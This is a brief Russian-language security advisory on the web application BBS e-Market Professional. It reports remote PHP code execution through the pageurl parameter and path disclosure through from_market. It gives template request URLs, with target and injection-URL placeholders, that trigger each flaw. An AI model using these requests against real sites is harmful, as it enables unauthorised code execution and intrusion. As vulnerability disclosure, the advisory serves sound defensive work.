Программа: BBS e-Market Professional 

Удаленный пользователь может выполнить произвольный PHP код на целевой системе. 

Пример: 

http://[TARGET]/becommunity/community/ index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/ index.php?from_market=Y&pageurl =[injection URL]

Также удаленный пользователь может раскрыть инсталляционный путь:

http://[TARGET]/becommunity/community/ index.php?from_market=[char]

Оставить мнение